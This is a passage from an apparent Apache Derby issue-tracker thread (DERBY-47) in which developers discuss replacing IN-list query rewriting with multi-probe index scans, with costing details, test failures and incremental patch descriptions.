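// A toy single-column result set over a fixed array of values, analogous in
// spirit to the execution-time InListResultSet described above.
public class ValueListResultSet {
    private final Object[] values;   // constants and/or parameter values, known by execution time
    private int position = -1;

    public ValueListResultSet(Object[] values) { this.values = values; }

    // Advance to the next "row"; returns false once the list is exhausted.
    public boolean next() { return ++position < values.length; }

    // The single column of the "table".
    public Object getValue() { return values[position]; }

    public static void main(String[] args) {
        ValueListResultSet rs = new ValueListResultSet(new Object[] {1, 2, 3});
        List<Object> seen = new ArrayList<>();
        while (rs.next()) seen.add(rs.getValue());
        System.out.println(seen);    // [1, 2, 3]
    }
}
```

Because the result set is driven by a single array reference, the generated code stays the same size regardless of how many values are in the list, which is the point made above about re-using the existing code generation.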
All of that said, the internal addition of a new InListResultSetNode to a FromList is not without its side effects. The following are the three areas in which I've noticed an unintended change in behavior caused by adding an InListRSN to a FromList. I have a "progress-not-perfection" workaround for the first issue; I still need to investigate the latter two (any input from others would of course be much appreciated).
1) Derby has internal restrictions on the types of queries that it can flatten. Most notably (and as James Synge also noted) a subquery cannot be flattened if its FromList contains more than a single FromTable. When rewriting the IN-list operator as described above, we add the new inListRSN to the appropriate FromList. That means that the FromList will now have more than one FromTable and thus the subquery is no longer flattenable. So for the following query:
select * from t2, (select * from t1 where i in (1, 2, 3)) x
the inner select is currently flattened during preprocessing. With the changes as I've described them, though, the IN list for the subquery would become an InListResultSetNode that is added to the inner FromList, thus rendering the inner query non-flattenable. In the interest of making progress (instead of perfection) on this issue, I simply added logic to skip rewriting an IN-list if it appears in a subquery. In that case we will default to normal IN-list processing as it is today.
2) I just discovered this morning that the addition of an InListResultSet to the FromList causes all of the SUR (scrollable updatable result set) tests that use an IN-clause to fail--apparently the presence of the InListResultSet results in a downgrade of the cursor scrollability to "CONCUR_READ_ONLY". I do not yet know why this is the case, nor do I know how to prevent it.
3) The store/readlocks.sql test fails with the proposed changes because of missing ROW locks. I do not know if these missing locks are a problem or just a side effect that can be "fixed" with a master update. More investigation required...
There were of course other tests that failed with row orderings and/or different plans, but so far as I can tell all of those are expected and correct--so I will just update the master files as needed.
For now I have just attached an initial version of the engine changes, d47_engine_doNotCommit_v1.patch, for general review/comments if anyone has any. I plan to look into the above issues more and will probably go to derby-dev with questions where needed. In the meantime, any feedback on the general approach as outlined above would be appreciated.
Oh, and by the way: I ran Derby47PerformanceTest.java (as attached to this issue) with 100,000 rows after applying this patch. Whereas the "Markers" strategy was by far the worst query before my changes, it ends up being the best strategy after my changes, beating out the "Marker" and "JoinTemp" strategies (which were previously the best) by roughly 30 and 25 percent, respectively.
Accidentally attached the _v1 files without granting license to ASF. So I'm reattaching with the correct "Attachment license" option.
Attaching the diff seen with store/readlocks.sql when d47_engine_doNotCommit_v1.patch is applied. This is the actual diff produced from the test; I'll try to post a modified diff that includes the relevant queries tomorrow, to (hopefully) aid in the determination of whether or not this diff is acceptable...
Attaching another readlocks diff, this time with more context so that the queries in question can be seen...
In one of my previous comments I mentioned that d47_engine_doNOTCommit_v1.patch has a problem where the addition of an InListResultSet to the FromList causes all of the SUR (Scrollable Updatable Result set) tests that use an IN-clause to fail. More specifically, the presence of the InListResultSet causes Derby to downgrade the cursor scrollability to "CONCUR_READ_ONLY".
I was eventually able to track down the cause of this behavior: whether or not Derby downgrades a result set to CONCUR_READ_ONLY depends on the value returned by the execution time result set in the "isForUpdate()" method. The default (as defined in NoPutResultSetImpl) is to return false.
In the case of the SUR tests (prior to my changes) we were getting a ScrollInsensitiveResultSet on top of a TableScanResultSet. The former gets its "isForUpdate()" value from the latter, and the latter correctly returns "true" to indicate that the result set is for update and thus no downgrade is needed. With d47_engine_doNotCommit_v1.patch applied, though, we add an InListResultSet to the FromList, which ultimately gives us a JoinResultSet at execution time. The JoinResultSet class does not define an "isForUpdate()" method, so we just return the default--which is "false". That causes the cursor concurrency to be downgraded to CONCUR_READ_ONLY.
To see what would happen I forced JoinResultSet to return "true" and then there was an ASSERT failure because JoinResultSets are not expected to be used for update/delete. The relevant code is in execute/JoinResultSet.java; in the "getRowLocation()" method we see the following comment:
- A join is combining rows from two sources, so it has no
- single row location to return; just return a null.
My guess is that, since the decision to disallow update/delete on a JoinResultSet was intentional, trying to code around that restriction is a bad idea. Or at the very least, it would require a lot more investigation and/or work.
Instead of pursuing that potentially treacherous path, I was able to come up with some logic that checks to see if a result set is updatable at compile time and, if so, to skip the IN-list rewrite. Early testing suggests that this is a viable solution.
HOWEVER, as the list of "exceptions" to the IN-list (_v1.patch) rewrite grew, I started to wonder if there wasn't some other solution to
DERBY-47 that would accomplish the same thing, minus all of the exception cases.
A few days later I came across some queries involving multiple IN-list predicates for a single SELECT statement. It turns out that many of those queries return incorrect results (duplicate rows) and/or run much more slowly with the _v1 patch than without.
The fact that there are so many "exceptions to the rule" combined with the undesirable behavior in the face of multiple IN-lists prompted me to abandon my initial idea of internally adding an InListResultSetNode to the user's FROM list (d47_engine_doNOTCommit_v1.patch).
Instead I have been working on an alternate approach to the problem. This second approach, like the first, is based on a comment made by someone else on this issue. This time, though, the comment in question is from James Synge and is as follows:
> The goal of the re-write is to avoid the source of
DERBY-47,
> which is that we don't have a multi-probe index scan, only
> range index scans, and worse still, when there are parameters
> involved, the range is the entire index.
In short, I decided to work with the execution-time result sets to see if it is possible to enforce some kind of "multi-probing" for indexes. That is to say, instead of scanning a range of values on the index, we want to make it so that Derby probes the index N times, where N is the size of the IN-list. For each probe, then, we'll get all rows for which the target column's value equals the N-th value in the IN-list.
Effectively, this comes down to the "Marker" strategy in Derby47PerformanceTest.java, where we evaluate an equality predicate, "column = ?", N times. Except of course that, unlike with the Marker strategy, we do the N evaluations internally instead of making the user do it.
A high-level description of how this approach will work is as follows:
- If any value in the IN-list is not a constant AND is not a parameter,
then do processing as usual (no optimizations, no rewrite). Notice
that with this approach we do still perform the optimization if
IN-list values are parameters. That is not the case for the current
Derby rewrite (i.e. without any changes for
DERBY-47).
Otherwise:
- During preprocessing, replace the IN-list with an equality predicate of
the form "column = ?". I.e. the right operand will be a parameter node,
the left operand will be whatever column reference belongs to the IN-list
(hereafter referred to as the "target column"). We call this new, internal
predicate an IN-list "probe predicate" because it will be the basis of
the multi-probing logic at execution time.
- During costing, the equality predicate "column = ?" will be treated as
a start/stop key by normal optimizer processing (no changes necessary).
If the predicate is deemed a start/stop key for the first column in
an index, then we'll multiply the estimated cost of "column = ?" by
the size of the IN-list, to account for the fact that we're actually
evaluating the predicate N times (not just once).
If the predicate is not a start/stop key for the first column in
the index, then we do not adjust the cost. See below for why.
- After we have found the best plan (including a best conglomerate choice),
check to see if the IN-list probe predicate is a start/stop key on the
first column in the chosen conglomerate. In order for that to be the
case the conglomerate must be an index (because we don't have start/stop
keys on table conglomerates). If the probe predicate is not a
start/stop key for the first column in the index, then we "revert" the probe
predicate back to its original IN-list form and evaluate it as a "normal"
InListOperatorNode. In this way we are effectively "giving up" on the multi-
probing approach. This is why we don't change the cost for such probe
predicates (mentioned above).
If the probe predicate is a start/stop key on the first column in
the index conglomerate, then leave it as it is.
- When it comes time to generate the byte code, look to see if we have
a probe predicate that is a start/stop key on the first column in the
chosen conglomerate. If so, generate an array of DataValueDescriptors
to hold the values from the corresponding IN-list and pass that array
to the underlying execution-time result set (i.e. to TableScanResultSet).
Then generate the probe predicate as a "normal" start/stop key for the
scan. This will serve as a "place-holder" for the IN-list values
at execution time.
- Finally, at execution time, instead of using a single start key and a
single stop key to define a scan range, we iterate through the IN-list
values and for each non-duplicate value V[i] (0 <= i < N) we treat V[i]
as both a start key and a stop key. Or put another way, we plug
V[i] into the "column = ?" predicate and retrieve all matching rows.
In this way we are "probing" the index for all rows having value V[i]
in the target column. Once all rows matching V[i] have been returned,
we then grab the next IN-list value, V[i+1], and we reposition the
scan (by calling "reopenCore()"), this time using V[i+1] as the start
and stop key (i.e. plugging V[i+1] into "column = ?"). This will
return all rows having value V[i+1] in the target column.
Continue this process until all values in the IN-list have been
exhausted. When we reach that point, we are done.
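The costing rule in the steps above amounts to scaling the single-probe estimate by the list size only when multi-probing will actually be used. A rough sketch (method and parameter names are hypothetical, not Derby's):

```java
public class ProbeCostSketch {
    // If the probe predicate "column = ?" is a start/stop key on the index's
    // first column, charge one probe per IN-list value; otherwise keep the
    // unadjusted estimate, since the probe predicate will be reverted to a
    // normal IN-list and evaluated the old way.
    static double estimatedCost(double singleProbeCost, int inListSize,
                                boolean startStopOnFirstColumn) {
        return startStopOnFirstColumn ? singleProbeCost * inListSize : singleProbeCost;
    }

    public static void main(String[] args) {
        System.out.println(estimatedCost(2.5, 4, true));   // 10.0 -- four probes
        System.out.println(estimatedCost(2.5, 4, false));  // 2.5  -- no adjustment
    }
}
```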
As a simple example, assume our query is of the form:
select ... from admin.changes where id in (1, 20000)
During preprocessing we will effectively change this to be:
select ... from admin.changes where id = ?
where "id = ?" is our IN-list "probe predicate". Note that we must make sure the optimizer recognizes "id = ?" as a disguised IN-list operator, as opposed to a true relational operator. The reason is that, while we do treat the probe predicate as a "fake" relational operator so that it can be seen as a start/stop key for the relevant indexes, there are many operations (ex. transitive closure) that should not be done on a probe predicate. So we have to be able to distinguish a probe predicate from other relational predicates.
With the probe predicate in place the optimizer will determine that it is a start/stop key for any index having column "ID" as the first column, and thus the optimizer is more likely to choose one of those indexes over a table scan. If we assume the optimizer decides to use an index on ID for the query, then we'll generate the IN-list values (1, 20000) and we will pass them to the underlying index scan. We'll then generate the probe predicate "column = ?" as a start and stop key for the scan.
At execution, then, the scan will first open up the index by using "1" as the start and stop key for the scan (or put another way, by plugging "1" into the probe predicate, "column = ?"). That will return all rows having ID equal to "1". Then when that scan ends, we'll reopen the scan a second time, this time using "20000" as the start and stop key, therefore returning all the 20000's. Meanwhile, all result sets higher up in the result set tree will just see a stream of rows from the index where ID only equals 1 or 20000.
This works for IN-lists with parameters, as well, because by the time execution starts we know what values the parameters hold.
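The probing loop described above can be sketched outside of Derby. Here a TreeMap stands in for the index conglomerate, and each map lookup plays the role of reopening the scan with the next value plugged into the "column = ?" probe predicate as both start and stop key; all names here are hypothetical, not Derby's actual classes:

```java
import java.util.*;

public class MultiProbeSketch {
    // Probe the "index" once per distinct, sorted IN-list value, instead of
    // scanning the whole key range between the smallest and largest value.
    static List<String> multiProbe(NavigableMap<Integer, List<String>> index, int[] inList) {
        int[] sorted = inList.clone();
        Arrays.sort(sorted);                            // sort so duplicates are adjacent
        List<String> rows = new ArrayList<>();
        Integer prev = null;
        for (int key : sorted) {
            if (prev != null && key == prev) continue;  // skip duplicate probe values
            prev = key;
            // "start key == stop key == value": all rows matching this value
            rows.addAll(index.getOrDefault(key, Collections.emptyList()));
        }
        return rows;
    }

    public static void main(String[] args) {
        NavigableMap<Integer, List<String>> index = new TreeMap<>();
        for (int id : new int[] {1, 5, 20000}) {
            index.put(id, Arrays.asList("row-" + id + "-a", "row-" + id + "-b"));
        }
        // select ... where id in (20000, 1, 1)  ->  two probes, not a range scan
        System.out.println(multiProbe(index, new int[] {20000, 1, 1}));
    }
}
```

The rows come back grouped by probe value, which matches the description above of higher result sets simply seeing a stream of rows whose target column equals one of the IN-list values.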
The first draft of code for implementing all of this is pretty much done, but I plan to post it in increments for ease of review. If all goes well, nothing should change functionally until the final patch, which will be the preprocessing patch that does the actual creation of the "probe predicate". At that point all of the machinery should be in place to recognize the probe predicate and function accordingly.
I ran Derby47PerformanceTest with this "multi-probing" approach and the numbers were similar to what I saw with the _v1 approach (more details coming later). Unlike the _v1 approach, though, the multi-probing approach works with subqueries, left outer joins, and scrollable updatable result sets. In addition, all of the test queries that I came up with involving multiple IN-lists run correctly with the multi-probing approach, and in many cases run quite a bit more quickly--neither of which was true for the _v1 approach. And yes, I do hope to add those test cases to the nightlies as part of my work on this issue.
Incremental patches are forthcoming. In the meantime, if anyone has any comments/suggestions on the approach outlined above, I would appreciate the feedback...
Posting d47_mp_relOpPredCheck_v1.patch, which is the first patch for the multi-probing ("mp") approach described in my previous comment. As mentioned in that comment, we need to be able to distinguish between "true" relational predicates and "probe predicates" so that we do not incorrectly perform certain operations on probe predicates. This first patch adds the logic to allow such distinction. In particular it:
- Adds a new method, "isRelationalOpPredicate()", to Predicate.java that
only returns true if the predicate is a "true" relational predicate; i.e.
it will return "false" for probe predicates.
- Updates several "if" statements in Predicate.java and PredicateList.java
to use the new method.
- Updates several utility methods in BinaryRelationalOperatorNode to distinguish
"true" relational operators from ones that are created internally for probe
predicates.
There should be no functional changes to Derby as a result of this patch, but just to make sure I ran derbyall and suites.All on Red Hat Linux with ibm142. The only failure was a known issue (
DERBY-2348).
This is a pretty small patch so unless I hear otherwise I plan to commit it tomorrow (Friday Feb 23, PST).
Army, this sounds like great progress, thanks. This is of course something which all DBMSs have to take care with, and I think Derby was already correct in this area (I vaguely recall reading that somewhere).
Performance may benefit from sorting the parameter values during execution, prior to the probing (e.g. if the index is large, and the number of parameters is also large). This sorting is done during compilation for literals.
Thank you very much for feedback, James.
>.
That's an excellent question; thank you for bringing it up. The best thing I could do to answer it was to try it out with the code in my local codeline. Does this example adequately reflect the scenario you are talking about? And are these the results you would expect? I think the answer to both of those questions is "Yes" but I just want to be safe.
Here's what I did in my local codeline. Note that lines beginning with "=" are debug lines that I have in my codeline to indicate that we are in fact doing "multi-probing" with x number of IN-list values.
create table t (inew int, iold int);
insert into t (iold) values 2, 1, -1, 0;
insert into t (iold) values 2, 1, -1, 0;
insert into t (iold) values 2, 1, -1, 0;
insert into t (iold) values 2, 1, -1, 0;
update t set inew = iold;
create index t_ix1 on t(inew);
ij> select * from t order by iold;
INEW |IOLD
-----------------------
-1 |-1
-1 |-1
-1 |-1
-1 |-1
0 |0
0 |0
0 |0
0 |0
1 |1
1 |1
1 |1
1
1 |0
1 |0
1 |0
1 |0
0 |1
0 |1
0 |1
0
0 |0
0 |0
0 |0
0 |0
1 |1
1 |1
1 |1
1 |1
2 |2
2 |2
2 |2
2 |2
16 rows selected
I believe that is the correct behavior, esp. since that's what I see in a clean codeline, as well.
> Performance may benefit from sorting the parameter values during execution, prior to the probing.
Yes, my changes include an execution time sort of the IN-list values (on the condition that the sort was not done during compilation). I have to admit, though, that I didn't make that decision for performance reasons; rather, I chose to sort the IN-list values to make it easier to detect (and skip over) duplicates in the IN-list...
I greatly appreciate your feedback on this and hope you will continue to ask any questions you might have. The more eyes, the better...
The multiple-probe approach always seemed the most natural to me, as multiple-probe support was already there
and used by the execution engine (for different reasons). It is great that it looks like you have found an elegant way
to get the optimizer to cost the approach and throw out cases that the approach does not support. Part of my preference is that I understand the mechanics of the multiple probe but didn't understand the semantics of the query rewrite.
Can you say something about why you chose to use an "x = ?" predicate with a special flag vs. just having a new multiple-probe in-list predicate (this question may not make sense - I am talking from outside of your description, not from knowledge of the internals)?
Also what happens to a query that is effectively an IN list that is hand written using OR's instead (ie, where i = 1 or i = 2 or ...).
Is that already changed to an IN list before we get to your new code here?
This is probably food for a different discussion, but I was wondering about the costing. What is the costing (% of the number of rows) for a WHERE ... IN (i.e. a parameter at compile time vs. a constant, in a non-unique index)? Is this just the cardinality statistic if it exists? What is the default without the statistic? Where I am going is that it probably does not make sense to have the estimate of the sum of terms be larger than the number of rows in the db. And I just want to understand how many terms it will take before we give up on the multiple probe.
Army, yes that's the behavior I was hoping to see. Thanks for double checking.
Thank you very much for your excellent questions, Mike. My attempted answers are below...
> Can you say something why you chose to use x = ? predicate with special flag vs. just having a new
> multiple-probe inlist predicate
Good question. I guess the short answer is simply: code reuse. All of the optimization, modification, generation, and execution-time logic for a single-sided predicate is already written and has (presumably) been working for years. Among other things this includes the notion of "start/stop" keys to (re-)position an index scan, which is ultimately what we want and is something that store already knows about. By using a flag we can slightly alter the behavior at key points of certain methods and then, for everything else, we just let Derby do what it already knows how to do. Minimal code changes are required and if something breaks, odds are that it is in the "slightly altered" behavior (or lack thereof), of which there is far less than "everything else".
If anyone knows of how we could improve/simplify the logic and/or performance by creating a new multi-probe predicate then I am certainly open to investigating that path further. But for now it seemed like the creation of "x = ?" with a flag was the simplest and quickest way to go, and it seems to provide the desired results. So that's where I ended up...
> Also what happens to a query that is effectively an IN list that is hand written using OR's instead
> (ie, where i = 1 or i = 2 or ...). Is that already changed to an IN list before we get to your new
> code here?
Yes, transformation of ORs into IN-lists occurs during preprocessing of the OR list. In OrNode.preprocess() there is logic to recognize if an OR list is transformable into an IN-list and, if so, the IN-list is created and then the "preprocess()" method of the IN-list is called. Since the creation of "probe predicates" occurs as part of IN-list preprocessing, this means that, yes, ORs are already converted to an IN-list before my new code takes effect.
As a side note, if there is an OR clause which itself has an IN-list as one of its operands then OrNode preprocessing will, with my proposed changes, combine the existing IN-list with the newly-created IN-list. For example:
select i, c from t1 where i in (1, 3, 5, 6) or i = 2 or i = 4
will be changed to:
select i, c from t1 where i in (1, 3, 5, 6, 2, 4)
This conversion will happen as part of OrNode.preprocess(), as well.
> What is the costing (% / number of rows) for a WHERE ... IN (i.e. a parameter at compile time
> vs. a constant, on a non-unique index)? Is this just the cardinality statistic if it exists?
Generally speaking the way costing for a base table conglomerate works is that we figure out how many rows there are in the table before any predicates are applied. Then, if we have a start/stop predicate and we have statistics, we will calculate a percentage of the rows expected (called "start/stop selectivity") based on the statistics. This ultimately brings us to the "selectivity(Object[])" method of StatisticsImpl, where there is the following code:
if (numRows == 0.0)
return 0.1;
return (double)(1/(double)numUnique);
I.e. the selectivity is 1 over the number of unique values in the conglomerate. Is this what you mean by "just the cardinality statistic if it exists?"
In any event we then multiply that percentage by the estimated row count to get a final estimated row count (I'm leaving out lots of "magic" costing operations here to keep things simple (and because I don't really understand all of that magic myself...)).
> What is the default without the statistic?
If we do not have statistics for a specific conglomerate then we will simply default the start/stop selectivity to 1.0, i.e. the row count will not be adjusted (at least not as relates to this discussion).
> Where I am going is that it probably does not make sense to have the estimate of the sum of terms
> be larger than the number of rows in the db.
Yes, you're absolutely right. This actually occurred to me yesterday, which is why I was poking around the stats code and thus was able to answer your previous question.
I agree that the estimated row count should not exceed the total number of rows. I think we could just account for this by adding an explicit check to see if rowCount * sizeOfInList yields a number larger than the number of rows in the conglomerate. If so then we set it to the number of rows in the conglomerate and that's that.
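For readers following along, the arithmetic described above can be sketched as follows. This is a hypothetical illustration (the class and method names are mine, not Derby's); the real logic is spread across StatisticsImpl and the optimizer's costing code:

```java
// Hypothetical sketch of the costing arithmetic discussed above.
// Derby's actual implementation is considerably more involved.
public class InListCostSketch {

    // Start/stop selectivity of a single "column = ?" probe:
    // 1/numUnique when statistics exist, 0.1 for an empty table,
    // and 1.0 (no adjustment) when there are no statistics at all.
    static double startStopSelectivity(boolean haveStats,
                                       double numRows,
                                       double numUnique) {
        if (!haveStats) {
            return 1.0;
        }
        if (numRows == 0.0) {
            return 0.1;
        }
        return 1.0 / numUnique;
    }

    // Estimated rows for the whole IN-list: one probe's estimate
    // multiplied by the number of IN-list terms, capped at the
    // table's total row count so the estimate can never exceed
    // the number of rows in the conglomerate.
    static double estimatedRows(double numRows,
                                double selectivity,
                                int inListSize) {
        double estimate = numRows * selectivity * inListSize;
        return Math.min(estimate, numRows);
    }
}
```

For example, with 1,000 rows, 4 unique values, and a 2-term IN-list this estimates 500 rows, while a 10-term list would hit the cap at 1,000 rows.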
> And just want to understand how many terms will it take before we give up on the multiple probe.
Another great question. The answer is that we do not ever give up on multi-probing as part of "costing" per se. Rather, we calculate a cost and then we compare that cost with all of the other costs found so far; if it's cheaper we use it, otherwise we discard it. Note that "cheaper" here encapsulates a lot of other logic and optimizer info that is far beyond the scope of this discussion.
So in the context of row counts, if the number of IN-list predicates multiplied by the estimated row count (after stat selectivity is applied) yields a high percentage row count (e.g. all rows in the table) then the odds of the optimizer choosing to use that particular index are lower. It may still choose to use the index, in which case multi-probing will take effect, but it probably will not (it all depends). Thus the point at which we give up on multi-probing is a factor of how unique the column values are and how many values are in the IN-list. If you're just looking at the size of the IN-list, then smaller lists are more likely to result in IN-list probing than larger ones--which I think is what we would expect.
That's a bit of a vague answer but so much of it depends on the query and the data in question that I wouldn't want to say anything more specific than that...
Committed d47_relOpPredCheck_v1.patch with svn 512079 after getting the okay from Mike to do so (on derby-dev):
Attaching the second incremental patch, d47_mp_CBO_MoAP_v1.patch, which updates the logic for cost-based optimization (CBO) and modification of access paths (MoAP) to recognize IN-list "probe predicates" and to handle them appropriately. More specifically this patch adds code to do the following:
- During costing, recognize when we're using a probe predicate as a start/stop key
and adjust the cost accordingly. This means multiplying the estimated cost and
row count for "column = ?" by the number of values in the IN-list (because we are
effectively going to evaluate "column = ?" N times, where N is the size of the
IN-list, and we could return one or more rows for each of the N evaluations).
As mentioned in Mike's comment above, we also want to make sure that the resultant
row count estimate is not greater than the total number of rows in the table.
- When determining which predicates can be used as start/stop keys for the current
conglomerate, only consider a probe predicate to be a start/stop key if it applies
to the first column in the conglomerate. Otherwise the probe predicate would
end up being generated as a store qualifier, which means we would only get rows
for which "column = ?" was true when the parameter was set to the first value
in the IN-list. That means we would end up with incorrect results (missing
rows).
- If cost-based optimization is complete and we are modifying access paths in
preparation for code generation, then take any probe predicates that are not
going to be used as start/stop keys for the chosen conglomerate and "revert" them
back to their original IN-list form (i.e. to the InListOperatorNodes from which
they were built). Those InListOpNodes will then be generated as normal IN-list
restrictions on the rows returned from store. If we did not do this reverting
then the predicates would ultimately be ignored (since they are not valid
qualifiers) and we would therefore end up with incorrect results (extra rows).
- If we're modifying access paths and we have chosen to do multi-probing of an index
then we disable bulk fetching for the target base table. Logically this is not a
requirement. However, it turns out that bulk fetch can lead to poor performance
when multi-probing an index if the number of probe values is high (several hundred
or more) BUT that number is still just a small fraction of the total number of rows
in the table. An example of such a scenario is found in the Derby47PerformanceTest
program attached to this issue. If the total number of rows in the ADMIN.CHANGES
table is 100,000 and there are 200 or more parameter markers in the IN-list, the
performance of multi-probing with bulk fetch enabled is just as bad as a table
scan--and actually gets worse as the number of parameters grows.
I cannot say with any certainty why bulk fetching performs so badly in this situation. My guess (and it's just a guess) is that when we bulk fetch we end up reading unnecessary pages from disk. My (perhaps faulty) thinking is that for each probe we do of the index our start and stop keys are going to be the same value. That means that we are probably going to be returning at most a handful of rows (more likely just a row or two). But perhaps bulk fetching is somehow causing us to read more pages from disk than we need, and the result is a slowdown in performance?
Does anyone know if that actually makes any sense? I could be completely wrong here so I'd appreciate any correction.
All of that said, I found that if I disable bulk fetch for multi-probing the performance returns to what I would expect (matching and even beating the "Marker" strategy posted by James), so that's what d47_mp_CBO_MoAP_v1.patch does. At the very least I'm hoping this is an acceptable step in the right direction.
As with my previous patch, this CBO_MoAP patch should not change any existing functionality because all of the new behavior depends on the existence of "probe predicates", which do not yet exist.
Review comments are much appreciated (esp. w.r.t the bulk fetching changes)...
Attaching a patch, d47_mp_addlTestCases.patch, which adds some additional IN-list test cases to the lang/inbetween.sql test. These test cases all currently behave correctly; by adding them to inbetween.sql we can ensure that they will continue to behave correctly once the DERBY-47 changes have been completed.
The underlying notion here is to make sure IN list behavior is correct when the left operand is a column reference that is a leading column in one or more indexes. The DERBY-47 changes will ultimately make it so that most of the new test cases result in an index-probing execution plan, thus we want to make sure that we're testing as many of the various index-based use cases as possible.
Note that these test cases are just testing correctness of results; additional tests will be added later to verify that indexes are in fact being chosen as a result of the DERBY-47 changes.
Patch committed with svn #512534:
Something about this SQL statement just tickled my fancy and made me smile!
update bt1 set de = cast (i/2.8 as decimal(4,1)) where i >= 10 and 2 * (cast (i as double) / 2.0) - (i / 2) = i / 2;
Committed d47_mp_CBO_MoAP_v1.patch with svn 513839:
URL:
Attaching d47_mp_codeGen_v1.patch, which updates Derby code generation to account for the potential presence of IN-list probe predicates. This patch does the following:
1 - Moves the code for generating a list of IN values into a new method, InListOperatorNode.generateListAsArray(). The new method is then called from two places:
A. InListOperatorNode.generateExpression(): the "normal" code-path for
generating IN-list bytecode (prior to the DERBY-47 changes).
B. PredicateList.generateInListValues(): new method for generating the IN-list
values that will serve as the execution-time index "probe" values. This
method also generates a boolean to indicate whether or not the values
are already sorted (i.e. if we sorted them at compile time, which means
they all must have been constants).
2 - Adds code to ParameterNode that allows generation of a "place-holder" value (instead of the ParameterNode itself) for probe predicates. This is required because a probe predicate has the form "column = ?" where the right operand is an internally generated parameter node that does not actually correspond to a user parameter. Since that parameter node is "fake" we can't really generate it; instead we need to be able to generate a legitimate ValueNode, either a constant node or a "real" parameter node, to serve as the place-holder. The codeGen patch makes that possible.
3 - Updates the generateExpression() method of BinaryOperatorNode to account for situations where the optimizer chooses a plan for which a probe predicate is not a useful start/stop key and thus is not being used for execution-time index probing. In this case we simply "revert" the probe predicate back to the InListOperatorNode from which it was created. Or put another way, we "give up" on index multi-probing and simply generate the original IN-list as a regular restriction.
In creating this patch I realized that having the "revert" code in BinaryOperatorNode.generateExpression() is a "catch-all" for any probe predicates that are not "useful" for the final access path. So by doing the "revert" operation at code generation time we remove the need for the explicit "revertToSourceInList()" calls that I added to "modification of access paths" code in the previous patch (d47_CBO_MoAP). Since I could not see any benefit to reverting during MoAP vs. reverting at code gen time, I opted to go with the latter. So this patch also removes the now unnecessary "revertToSourceInList()" calls from PredicateList.java.
4 - Adds logic to NestedLoopJoinStrategy to generate a new type of result set, MultiProbeTableScanResultSet, for probing an index at execution time. The new result set does not yet exist (incremental development) but the code to generate such a result set is added as part of this patch. Note that we should never choose to do "multi-probing" for a hash join; comments explaining why are in the patch, along with a sanity assertion to catch any cases for which that might incorrectly happen.
5 - Adds a new method, "getMultiProbeTableScanResultSet()", to the ResultSetFactory interface. Also adds a corresponding stub method to GenericResultSetFactory. The latter is just a dummy method and will be filled in with the appropriate code as part of a subsequent patch.
I ran derbyall and suites.All on Red Hat Linux with ibm142 and there were no new failures. Reviews are appreciated, as always. If I hear no objections I will commit this patch in a couple of days.
Hi Army, just wanted to let you know that I've been reading your notes and reading the patches. If I have any concrete comments or suggestions, I'll barge in, but so far it's all looked quite good to me. I particularly want to thank you for taking the time to comment the code so clearly and thoroughly; it makes the world of difference to us code-readers.
Committed d47_mp_codeGen_v1.patch with svn # 515795:
URL:
And now attaching d47_mp_exec_v1.patch, which is a patch to implement execution-time "probing" given a probe predicate "place-holder" and a list of IN values. This patch creates a new execution-time result set, MultiProbeTableScanResultSet, to perform the probing. Generally speaking the process is as follows, where "probe list" (aka "probeValues") corresponds to the IN list in question.
0 - Open a scan using the first value in the (sorted) probe list as a start AND stop key.
Then for each call to "getNextRowCore()":
1 - See if we have a row to read from the current scan position. If so, return that row (done).
2 - If there are no more rows to read from the current scan position AND if there are more
probe values to look at, then a) reopen the scan using the next probe value as the start/
stop key and b) go back to step 1. Otherwise proceed to step 3.
3 - Return null (no more rows).
At a higher-level the changes in exec_v1.patch make it so that repeated calls to MultiProbeTableScanResultSet.getNextRowCore() will first return all rows matching probeValues[0], then all rows matching probeValues[1], and so on (duplicate probe values are ignored). Once all matching rows for all values in probeValues have been returned, the call to getNextRowCore() will return null, thereby ending the scan.
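To make the numbered steps concrete, here is a self-contained sketch of that loop. The names are illustrative only; the real MultiProbeTableScanResultSet extends TableScanResultSet and repositions a store scan using start/stop keys, whereas this toy version "reopens" by rescanning an in-memory array:

```java
import java.util.Arrays;

// Simplified sketch of the MultiProbeTableScanResultSet probing loop
// described in steps 0-3 above. The indexedColumn array stands in for
// the index being probed; each "reopen" restarts the fake scan with
// the next probe value serving as the start AND stop key.
public class MultiProbeSketch {

    private final int[] probeValues;   // sorted, duplicates removed
    private final int[] indexedColumn; // stand-in for the scanned index
    private int probeIdx = 0;          // current probe value
    private int scanPos = 0;           // current scan position

    public MultiProbeSketch(int[] inListValues, int[] indexedColumn) {
        // Step 0: sort the probe list; duplicates are ignored.
        this.probeValues =
            Arrays.stream(inListValues).sorted().distinct().toArray();
        this.indexedColumn = indexedColumn;
    }

    // Returns the next matching "row" (here, just the column value),
    // or null once every probe value has been exhausted.
    public Integer getNextRowCore() {
        while (probeIdx < probeValues.length) {
            // Step 1: any more rows at the current scan position?
            while (scanPos < indexedColumn.length) {
                int row = indexedColumn[scanPos++];
                if (row == probeValues[probeIdx]) {
                    return row;
                }
            }
            // Step 2: "reopen" the scan with the next probe value.
            probeIdx++;
            scanPos = 0;
        }
        return null; // Step 3: no more rows.
    }
}
```

Repeated calls return all rows matching probeValues[0], then all rows matching probeValues[1], and so on, mirroring the behavior described in the previous paragraph.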
In order to accommodate the above behavior, the following changes were made to existing files:
1 - Add correct instantiation logic to the "getMultiProbeTableScanResultSet()"
method of GenericResultSetFactory, which was just a stub method before this
patch.
2 - Overloaded methods in TableScanResultSet to allow the passing of a "probe value"
into the openScanController() and reopenScanController() methods. The methods
then use the probe value (if one exists) as the start/stop key for positioning
a scan, instead of using the start/stop key passed into the result set constructor.
3 - Made the iapi.types.DataType class implement the java.lang.Comparable interface
for the sake of easy sorting (just let the JVM do the sort). Since DataType (the
superclass of all datatypes and base implementation of the DataValueDescriptor
interface) already has a "compare()" method that returns an integer to indicate
less than, greater than, or equal, all we have to do is wrap that method inside
a "compareTo()" method and we're done.
There are two issues worth mentioning regarding this sort. First, the compareTo()
method does not throw any exceptions, so if an error occurs while trying to compare
two DataValueDescriptors, we will simply treat the values as "equal" when running
in insane mode (in sane mode we will throw an assertion failure). Is this
acceptable? If not, is there a better way to handle this, aside from writing my
own sorting code? (which is doable but seems like overkill).
Second, for some strange reason sorting the probeValues array directly (i.e.
in-place sort) leads to incorrect parameter value assignment when executing a
prepared statement multiple times. I was unable to figure out why that might
be (maybe related to DERBY-827?). To get around the problem I create clones
of the IN values and then sort the clones. That solves the problem but has
the obvious drawback of extra memory requirements. I'm hoping that for now
this is an okay workaround (progress, not perfection), but if anyone has any
ideas as to what could be going on here, I'd appreciate the input.
And of course, if there are any other reasons why it's bad to make DataType
